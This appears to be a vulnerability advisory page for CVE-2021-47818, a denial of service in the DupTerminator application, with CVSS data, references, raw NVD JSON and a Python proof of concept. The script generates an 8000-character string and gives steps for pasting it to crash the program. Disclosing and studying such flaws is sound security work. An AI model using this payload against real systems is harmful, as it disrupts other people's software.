CVE-2021-47818

Description

DupTerminator 1.4.5639.37199 contains a denial of service vulnerability that allows attackers to crash the application by inputting a long character string in the Excluded text box. Attackers can generate a payload of 8000 repeated characters to trigger the application to stop working on Windows 10.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

DupTerminator 1.4.5639.37199

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2021-47818 PoC - DupTerminator DoS
# Description: Generates a payload of 8000 repeated characters
# to trigger denial of service in DupTerminator Excluded text box

def generate_dos_payload():
    """
    Generate DoS payload for DupTerminator vulnerability.
    The application crashes when a string of 8000 repeated characters
    is entered in the 'Excluded' text box.
    """
    # Payload size: 8000 characters
    payload_length = 8000
    
    # Generate repeated character payload
    # Can use any character, typically 'A' or '\x41'
    payload = 'A' * payload_length
    
    return payload

def main():
    print("CVE-2021-47818 PoC - DupTerminator DoS")
    print("=" * 50)
    
    payload = generate_dos_payload()
    
    print(f"Generated payload length: {len(payload)}")
    print(f"First 50 characters: {payload[:50]}...")
    print("\nUsage:")
    print("1. Open DupTerminator application")
    print("2. Navigate to 'Excluded' text box")
    print("3. Paste the generated payload")
    print("4. Application will crash/stop responding")
    
    # Save payload to file for manual testing
    with open('cve_2021_47818_payload.txt', 'w') as f:
        f.write(payload)
    print(f"\nPayload saved to: cve_2021_47818_payload.txt")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47818
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47818
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47818/
[4] VulDB https://vuldb.com/cve/CVE-2021-47818
[5] https://sourceforge.net/projects/dupterminator/
[6] https://www.exploit-db.com/exploits/49917
[7] https://www.vulncheck.com/advisories/dupterminator-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47818", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:06.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DupTerminator 1.4.5639.37199 contains a denial of service vulnerability that allows attackers to crash the application by inputting a long character string in the Excluded text box. Attackers can generate a payload of 8000 repeated characters to trigger the application to stop working on Windows 10."}, {"lang": "es", "value": "DupTerminator 1.4.5639.37199 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes bloquear la aplicación al introducir una cadena de caracteres larga en el cuadro de texto Excluded. Los atacantes pueden generar una carga útil de 8000 caracteres repetidos para provocar que la aplicación deje de funcionar en Windows 10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://sourceforge.net/projects/dupterminator/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49917", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/dupterminator-denial-of-service", "source": "[email protected]"}]}}